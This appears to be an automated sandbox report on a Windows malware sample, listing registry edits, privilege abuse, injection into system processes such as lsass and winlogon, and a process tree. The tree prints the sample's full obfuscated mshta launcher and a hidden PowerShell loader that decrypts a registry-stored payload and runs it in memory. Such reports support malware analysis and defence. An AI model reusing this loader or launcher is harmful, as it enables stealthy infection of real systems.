Set value (int)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\NodeSlot = "4"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Generic"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Software\Microsoft	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Software\Microsoft\SystemCertificates\AuthRoot\AutoUpdate\Disallow = 5f090e61d1aada01	svchost.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

5624 PING.EXE

pid	process
5624	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Uni.bat.exedllhost.exedllhost.exe$sxr-powershell.exedllhost.exedllhost.exe$sxr-powershell.exedllhost.exedllhost.exe

pid	process
2624	Uni.bat.exe
2624	Uni.bat.exe
2624	Uni.bat.exe
2604	dllhost.exe
2604	dllhost.exe
2452	dllhost.exe
2452	dllhost.exe
2452	dllhost.exe
2452	dllhost.exe
2604	dllhost.exe
2604	dllhost.exe
2624	Uni.bat.exe
2624	Uni.bat.exe
1360	$sxr-powershell.exe
1360	$sxr-powershell.exe
1360	$sxr-powershell.exe
1360	$sxr-powershell.exe
2156	dllhost.exe
2156	dllhost.exe
2156	dllhost.exe
2156	dllhost.exe
4868	dllhost.exe
4868	dllhost.exe
4868	dllhost.exe
4868	dllhost.exe
1360	$sxr-powershell.exe
1360	$sxr-powershell.exe
3900	$sxr-powershell.exe
1360	$sxr-powershell.exe
3552	dllhost.exe
3552	dllhost.exe
3552	dllhost.exe
3552	dllhost.exe
3552	dllhost.exe
3552	dllhost.exe
3552	dllhost.exe
3552	dllhost.exe
3044	dllhost.exe
3044	dllhost.exe
3552	dllhost.exe
3552	dllhost.exe
3044	dllhost.exe
3044	dllhost.exe
3552	dllhost.exe
3552	dllhost.exe
3044	dllhost.exe
3044	dllhost.exe
3552	dllhost.exe
3552	dllhost.exe
3900	$sxr-powershell.exe
3900	$sxr-powershell.exe
3552	dllhost.exe
3552	dllhost.exe
3044	dllhost.exe
3044	dllhost.exe
3552	dllhost.exe
3552	dllhost.exe
3900	$sxr-powershell.exe
3900	$sxr-powershell.exe
3552	dllhost.exe
3552	dllhost.exe
3044	dllhost.exe
3044	dllhost.exe
3552	dllhost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3312 Explorer.EXE

pid	process
3312	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Uni.bat.exedllhost.exedllhost.exe$sxr-powershell.exedllhost.exedllhost.exe$sxr-powershell.exedllhost.exesvchost.exeExplorer.EXEdllhost.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	2624	Uni.bat.exe
Token: SeDebugPrivilege	2624	Uni.bat.exe
Token: SeDebugPrivilege	2604	dllhost.exe
Token: SeDebugPrivilege	2452	dllhost.exe
Token: SeDebugPrivilege	1360	$sxr-powershell.exe
Token: SeDebugPrivilege	1360	$sxr-powershell.exe
Token: SeDebugPrivilege	4868	dllhost.exe
Token: SeDebugPrivilege	2156	dllhost.exe
Token: SeDebugPrivilege	3900	$sxr-powershell.exe
Token: SeDebugPrivilege	1360	$sxr-powershell.exe
Token: SeDebugPrivilege	3552	dllhost.exe
Token: SeAuditPrivilege	2356	svchost.exe
Token: SeShutdownPrivilege	3312	Explorer.EXE
Token: SeCreatePagefilePrivilege	3312	Explorer.EXE
Token: SeShutdownPrivilege	3312	Explorer.EXE
Token: SeCreatePagefilePrivilege	3312	Explorer.EXE
Token: SeShutdownPrivilege	3312	Explorer.EXE
Token: SeCreatePagefilePrivilege	3312	Explorer.EXE
Token: SeShutdownPrivilege	3312	Explorer.EXE
Token: SeCreatePagefilePrivilege	3312	Explorer.EXE
Token: SeAuditPrivilege	2356	svchost.exe
Token: SeShutdownPrivilege	3312	Explorer.EXE
Token: SeCreatePagefilePrivilege	3312	Explorer.EXE
Token: SeShutdownPrivilege	3312	Explorer.EXE
Token: SeCreatePagefilePrivilege	3312	Explorer.EXE
Token: SeShutdownPrivilege	3312	Explorer.EXE
Token: SeCreatePagefilePrivilege	3312	Explorer.EXE
Token: SeShutdownPrivilege	3312	Explorer.EXE
Token: SeCreatePagefilePrivilege	3312	Explorer.EXE
Token: SeShutdownPrivilege	3312	Explorer.EXE
Token: SeCreatePagefilePrivilege	3312	Explorer.EXE
Token: SeShutdownPrivilege	3312	Explorer.EXE
Token: SeCreatePagefilePrivilege	3312	Explorer.EXE
Token: SeDebugPrivilege	3044	dllhost.exe
Token: SeShutdownPrivilege	3312	Explorer.EXE
Token: SeCreatePagefilePrivilege	3312	Explorer.EXE
Token: SeShutdownPrivilege	3312	Explorer.EXE
Token: SeCreatePagefilePrivilege	3312	Explorer.EXE
Token: SeShutdownPrivilege	3312	Explorer.EXE
Token: SeCreatePagefilePrivilege	3312	Explorer.EXE
Token: SeShutdownPrivilege	3312	Explorer.EXE
Token: SeCreatePagefilePrivilege	3312	Explorer.EXE
Token: SeAssignPrimaryTokenPrivilege	2480	svchost.exe
Token: SeIncreaseQuotaPrivilege	2480	svchost.exe
Token: SeSecurityPrivilege	2480	svchost.exe
Token: SeTakeOwnershipPrivilege	2480	svchost.exe
Token: SeLoadDriverPrivilege	2480	svchost.exe
Token: SeSystemtimePrivilege	2480	svchost.exe
Token: SeBackupPrivilege	2480	svchost.exe
Token: SeRestorePrivilege	2480	svchost.exe
Token: SeShutdownPrivilege	2480	svchost.exe
Token: SeSystemEnvironmentPrivilege	2480	svchost.exe
Token: SeUndockPrivilege	2480	svchost.exe
Token: SeManageVolumePrivilege	2480	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2480	svchost.exe
Token: SeIncreaseQuotaPrivilege	2480	svchost.exe
Token: SeSecurityPrivilege	2480	svchost.exe
Token: SeTakeOwnershipPrivilege	2480	svchost.exe
Token: SeLoadDriverPrivilege	2480	svchost.exe
Token: SeSystemtimePrivilege	2480	svchost.exe
Token: SeBackupPrivilege	2480	svchost.exe
Token: SeRestorePrivilege	2480	svchost.exe
Token: SeShutdownPrivilege	2480	svchost.exe
Token: SeSystemEnvironmentPrivilege	2480	svchost.exe

Suspicious use of FindShellTrayWindow 4 IoCs

Processes:

Explorer.EXE

pid process

3312 Explorer.EXE
3312 Explorer.EXE
3312 Explorer.EXE
3312 Explorer.EXE
Suspicious use of SendNotifyMessage 3 IoCs

Processes:

Explorer.EXE

pid process

3312 Explorer.EXE
3312 Explorer.EXE
3312 Explorer.EXE
Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

$sxr-powershell.exeExplorer.EXEConhost.exe

pid process

1360 $sxr-powershell.exe
3312 Explorer.EXE
3312 Explorer.EXE
3312 Explorer.EXE
3312 Explorer.EXE
4900 Conhost.exe

pid	process
3312	Explorer.EXE
3312	Explorer.EXE
3312	Explorer.EXE
3312	Explorer.EXE

pid	process
3312	Explorer.EXE
3312	Explorer.EXE
3312	Explorer.EXE

pid	process
1360	$sxr-powershell.exe
3312	Explorer.EXE
3312	Explorer.EXE
3312	Explorer.EXE
3312	Explorer.EXE
4900	Conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exeUni.bat.exe$sxr-mshta.exe$sxr-cmd.exe$sxr-powershell.exedllhost.exe

description	pid	process	target process
PID 2932 wrote to memory of 2624	2932	cmd.exe	Uni.bat.exe
PID 2932 wrote to memory of 2624	2932	cmd.exe	Uni.bat.exe
PID 2624 wrote to memory of 2604	2624	Uni.bat.exe	dllhost.exe
PID 2624 wrote to memory of 2604	2624	Uni.bat.exe	dllhost.exe
PID 2624 wrote to memory of 2604	2624	Uni.bat.exe	dllhost.exe
PID 2624 wrote to memory of 2604	2624	Uni.bat.exe	dllhost.exe
PID 2624 wrote to memory of 2604	2624	Uni.bat.exe	dllhost.exe
PID 2624 wrote to memory of 2604	2624	Uni.bat.exe	dllhost.exe
PID 2624 wrote to memory of 2604	2624	Uni.bat.exe	dllhost.exe
PID 2624 wrote to memory of 2452	2624	Uni.bat.exe	dllhost.exe
PID 2624 wrote to memory of 2452	2624	Uni.bat.exe	dllhost.exe
PID 2624 wrote to memory of 2452	2624	Uni.bat.exe	dllhost.exe
PID 2624 wrote to memory of 2452	2624	Uni.bat.exe	dllhost.exe
PID 2624 wrote to memory of 2452	2624	Uni.bat.exe	dllhost.exe
PID 2624 wrote to memory of 2452	2624	Uni.bat.exe	dllhost.exe
PID 2624 wrote to memory of 2452	2624	Uni.bat.exe	dllhost.exe
PID 2624 wrote to memory of 2452	2624	Uni.bat.exe	dllhost.exe
PID 2624 wrote to memory of 2452	2624	Uni.bat.exe	dllhost.exe
PID 2244 wrote to memory of 4660	2244	$sxr-mshta.exe	$sxr-cmd.exe
PID 2244 wrote to memory of 4660	2244	$sxr-mshta.exe	$sxr-cmd.exe
PID 4660 wrote to memory of 1360	4660	$sxr-cmd.exe	$sxr-powershell.exe
PID 4660 wrote to memory of 1360	4660	$sxr-cmd.exe	$sxr-powershell.exe
PID 1360 wrote to memory of 4868	1360	$sxr-powershell.exe	dllhost.exe
PID 1360 wrote to memory of 4868	1360	$sxr-powershell.exe	dllhost.exe
PID 1360 wrote to memory of 4868	1360	$sxr-powershell.exe	dllhost.exe
PID 1360 wrote to memory of 4868	1360	$sxr-powershell.exe	dllhost.exe
PID 1360 wrote to memory of 4868	1360	$sxr-powershell.exe	dllhost.exe
PID 1360 wrote to memory of 4868	1360	$sxr-powershell.exe	dllhost.exe
PID 1360 wrote to memory of 4868	1360	$sxr-powershell.exe	dllhost.exe
PID 1360 wrote to memory of 3112	1360	$sxr-powershell.exe	dllhost.exe
PID 1360 wrote to memory of 3112	1360	$sxr-powershell.exe	dllhost.exe
PID 1360 wrote to memory of 3112	1360	$sxr-powershell.exe	dllhost.exe
PID 1360 wrote to memory of 2156	1360	$sxr-powershell.exe	dllhost.exe
PID 1360 wrote to memory of 2156	1360	$sxr-powershell.exe	dllhost.exe
PID 1360 wrote to memory of 2156	1360	$sxr-powershell.exe	dllhost.exe
PID 1360 wrote to memory of 2156	1360	$sxr-powershell.exe	dllhost.exe
PID 1360 wrote to memory of 2156	1360	$sxr-powershell.exe	dllhost.exe
PID 1360 wrote to memory of 2156	1360	$sxr-powershell.exe	dllhost.exe
PID 1360 wrote to memory of 2156	1360	$sxr-powershell.exe	dllhost.exe
PID 1360 wrote to memory of 2156	1360	$sxr-powershell.exe	dllhost.exe
PID 1360 wrote to memory of 2156	1360	$sxr-powershell.exe	dllhost.exe
PID 1360 wrote to memory of 3900	1360	$sxr-powershell.exe	$sxr-powershell.exe
PID 1360 wrote to memory of 3900	1360	$sxr-powershell.exe	$sxr-powershell.exe
PID 1360 wrote to memory of 3552	1360	$sxr-powershell.exe	dllhost.exe
PID 1360 wrote to memory of 3552	1360	$sxr-powershell.exe	dllhost.exe
PID 1360 wrote to memory of 3552	1360	$sxr-powershell.exe	dllhost.exe
PID 1360 wrote to memory of 3552	1360	$sxr-powershell.exe	dllhost.exe
PID 1360 wrote to memory of 3552	1360	$sxr-powershell.exe	dllhost.exe
PID 1360 wrote to memory of 3552	1360	$sxr-powershell.exe	dllhost.exe
PID 1360 wrote to memory of 3552	1360	$sxr-powershell.exe	dllhost.exe
PID 1360 wrote to memory of 3552	1360	$sxr-powershell.exe	dllhost.exe
PID 1360 wrote to memory of 3552	1360	$sxr-powershell.exe	dllhost.exe
PID 3552 wrote to memory of 632	3552	dllhost.exe	winlogon.exe
PID 3552 wrote to memory of 688	3552	dllhost.exe	lsass.exe
PID 3552 wrote to memory of 996	3552	dllhost.exe	svchost.exe
PID 3552 wrote to memory of 460	3552	dllhost.exe	dwm.exe
PID 3552 wrote to memory of 720	3552	dllhost.exe	svchost.exe
PID 3552 wrote to memory of 1036	3552	dllhost.exe	svchost.exe
PID 3552 wrote to memory of 1044	3552	dllhost.exe	svchost.exe
PID 3552 wrote to memory of 1100	3552	dllhost.exe	svchost.exe
PID 3552 wrote to memory of 1160	3552	dllhost.exe	svchost.exe
PID 3552 wrote to memory of 1180	3552	dllhost.exe	svchost.exe
PID 3552 wrote to memory of 1212	3552	dllhost.exe	svchost.exe
PID 3552 wrote to memory of 1324	3552	dllhost.exe	svchost.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

5712 attrib.exe

pid	process
5712	attrib.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:632

C:\Windows\system32\dwm.exe
"dwm.exe"
2⤵
PID:460

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{1ef4e76f-b587-4b55-8c97-a2c501568a72}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2604

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{b248a598-76f8-4679-b0c0-ebcfaf65a8ba}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4868

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{c6e84c9a-b4b7-4c6b-8f52-e96d28091046}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3552

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{35c6c327-8b8b-41fd-95a7-e1585bc8e8b9}
2⤵
PID:4672

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{2cb9cbce-6196-4d8c-aa8e-b1bf5562dba0}
2⤵
PID:6024

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{fa61374d-0cf9-4f46-9a28-a8fffc47feeb}
2⤵
PID:5264

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{b50dd45c-b3cb-4658-ad0a-30d87db9b509}
2⤵
PID:4844

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4844 -s 324
3⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:5644

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{95890ecf-54f4-4413-bec7-bbadde83b176}
2⤵
PID:5320

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5320 -s 312
3⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:6072

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{ffd005f7-d39f-4c1f-9223-24e8a618dfd5}
2⤵
PID:5224

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:688

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:996

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:720

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:1036

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1044

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1100

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1160

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1180

C:\Windows\$sxr-mshta.exe
C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-jUsBURfHSoufmNeEAjpO4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2244

C:\Windows\$sxr-cmd.exe
"C:\Windows\$sxr-cmd.exe" /c %$sxr-jUsBURfHSoufmNeEAjpO4312:&#<?=%
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4660

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:4336

C:\Windows\$sxr-powershell.exe
C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function hufeg($iDMxb){ $Elzpw=[System.Security.Cryptography.Aes]::Create(); $Elzpw.Mode=[System.Security.Cryptography.CipherMode]::CBC; $Elzpw.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $Elzpw.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk='); $Elzpw.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA=='); $wCTZr=$Elzpw.('rotpyrceDetaerC'[-1..-15] -join '')(); $YgtPo=$wCTZr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iDMxb, 0, $iDMxb.Length); $wCTZr.Dispose(); $Elzpw.Dispose(); $YgtPo;}function FJcTY($iDMxb){ $KHdof=New-Object System.IO.MemoryStream(,$iDMxb); $mdDGq=New-Object System.IO.MemoryStream; $PZsap=New-Object System.IO.Compression.GZipStream($KHdof, [IO.Compression.CompressionMode]::Decompress); $PZsap.CopyTo($mdDGq); $PZsap.Dispose(); $KHdof.Dispose(); $mdDGq.Dispose(); $mdDGq.ToArray();}function vUmWc($iDMxb,$PbTpW){ $YHPse=[System.Reflection.Assembly]::Load([byte[]]$iDMxb); $aMqIy=$YHPse.EntryPoint; $aMqIy.Invoke($null, $PbTpW);}$Elzpw1 = New-Object System.Security.Cryptography.AesManaged;$Elzpw1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$Elzpw1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$Elzpw1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk=');$Elzpw1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA==');$lkChZ = $Elzpw1.('rotpyrceDetaerC'[-1..-15] -join '')();$kveij = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('skxuT638mXYXO82tnMu4Nw==');$kveij = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij, 0, $kveij.Length);$kveij = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij);$uYwHJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7tPhtRoBPpmbD4jKqCrROmZ5ihpYMWVokvpj2Ng/Pz8=');$uYwHJ = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uYwHJ, 0, $uYwHJ.Length);$uYwHJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uYwHJ);$XPhKE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MN4dM3v9612JtLqaveCMYg==');$XPhKE = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XPhKE, 0, $XPhKE.Length);$XPhKE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XPhKE);$muibj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('omE0gz6POPNwhNmUAnPGH44LhwPPACLWik/KT0dk5wsKXAxtKag+L5FPGR5kaqhlGUck2HtfdRNBwrYMOEAetiGgAox0exmtDDnAYLadphZBvi4OP8B8BNL4k5y/z1AEr7oudmgyCQifH3aXxa/gUUa4xjDsSD2YTOub7PHlsdmqG91RSBUMJH4vfT2zptSsj0OSscQsY4xVPZ8OjeRKbzP+BjF+Uue1s9LcXQdrizsUEKJN4dY28g0skU19VzfudgJv7Qa+SS93YCgWa9n+oNhygZquca/xgmF4Z+su7WedF+8tBgUKzviRtdEdVgLq/OMSlirCLjvFnSHC2y9K1oTEEyD1mQB836kwPebOOTmBNH6vdn2bEQQYiF/vc3FItt5vYPuWyJGzUen95KOQjYu7YoPz/dFXDUgmI65vnuw=');$muibj = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($muibj, 0, $muibj.Length);$muibj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($muibj);$DHHcr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tYnkG6mWBgWnZf6oIR3L5A==');$DHHcr = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DHHcr, 0, $DHHcr.Length);$DHHcr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DHHcr);$EQNXr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5fF2zWzAZ0BefyD1XaGcLw==');$EQNXr = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($EQNXr, 0, $EQNXr.Length);$EQNXr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($EQNXr);$mYQZS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3I7S8iNpJjrn0k9Lgckneg==');$mYQZS = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mYQZS, 0, $mYQZS.Length);$mYQZS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mYQZS);$DbkFT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v8BsdeVWD9I78LbbRhRFrA==');$DbkFT = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DbkFT, 0, $DbkFT.Length);$DbkFT = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DbkFT);$jgfOd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OEFFbXtp5W2U1hAoq0CpPw==');$jgfOd = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jgfOd, 0, $jgfOd.Length);$jgfOd = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jgfOd);$kveij0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1+Vym/OwDnC1v1RFNGQ5MA==');$kveij0 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij0, 0, $kveij0.Length);$kveij0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij0);$kveij1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1UB7UYof3ztQu3+ei666DQ==');$kveij1 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij1, 0, $kveij1.Length);$kveij1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij1);$kveij2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9594UuKb/Z+/WVWczIhxbQ==');$kveij2 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij2, 0, $kveij2.Length);$kveij2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij2);$kveij3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lxkDZyakK1CM3mmPkfi6OQ==');$kveij3 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij3, 0, $kveij3.Length);$kveij3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij3);$lkChZ.Dispose();$Elzpw1.Dispose();if (@(get-process -ea silentlycontinue $kveij3).count -gt 1) {exit};$ebqGe = [Microsoft.Win32.Registry]::$DbkFT.$mYQZS($kveij).$EQNXr($uYwHJ);$SceND=[string[]]$ebqGe.Split('\');$sNXpr=FJcTY(hufeg([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($SceND[1])));vUmWc $sNXpr (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$GiWwX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($SceND[0]);$Elzpw = New-Object System.Security.Cryptography.AesManaged;$Elzpw.Mode = [System.Security.Cryptography.CipherMode]::CBC;$Elzpw.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$Elzpw.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk=');$Elzpw.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA==');$wCTZr = $Elzpw.('rotpyrceDetaerC'[-1..-15] -join '')();$GiWwX = $wCTZr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GiWwX, 0, $GiWwX.Length);$wCTZr.Dispose();$Elzpw.Dispose();$KHdof = New-Object System.IO.MemoryStream(, $GiWwX);$mdDGq = New-Object System.IO.MemoryStream;$PZsap = New-Object System.IO.Compression.GZipStream($KHdof, [IO.Compression.CompressionMode]::$kveij1);$PZsap.$jgfOd($mdDGq);$PZsap.Dispose();$KHdof.Dispose();$mdDGq.Dispose();$GiWwX = $mdDGq.ToArray();$cyNnW = $muibj | IEX;$YHPse = $cyNnW::$kveij2($GiWwX);$aMqIy = $YHPse.EntryPoint;$aMqIy.$kveij0($null, (, [string[]] ($XPhKE)))
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1360

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{1ad686d3-6289-4170-85b2-858f2c56b85a}
5⤵
PID:3112

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{c3d49fa7-52c6-4784-98d1-76949fb3e7b8}
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2156

C:\Windows\$sxr-powershell.exe
